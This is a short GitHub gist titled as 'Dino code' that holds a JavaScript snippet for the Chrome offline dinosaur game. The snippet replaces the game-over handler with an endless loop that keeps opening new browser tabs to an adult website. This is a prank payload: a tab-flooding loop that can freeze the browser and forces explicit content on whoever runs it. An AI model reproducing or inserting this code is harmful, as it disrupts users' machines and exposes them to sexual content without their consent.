Skip to content

Instantly share code, notes, and snippets.

@hdboye
Last active September 8, 2021 09:53
Show Gist options
  • Save hdboye/c19b5ad522673c06f6675094ff3d3277 to your computer and use it in GitHub Desktop.
Save hdboye/c19b5ad522673c06f6675094ff3d3277 to your computer and use it in GitHub Desktop.
Dino code. I tried. It sucks.
function ntab(url){
window.open(url, '_blank');
}
Runner.instance_.gameOver = function(){
while(true){
ntab('https://r34.app');
}
};
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment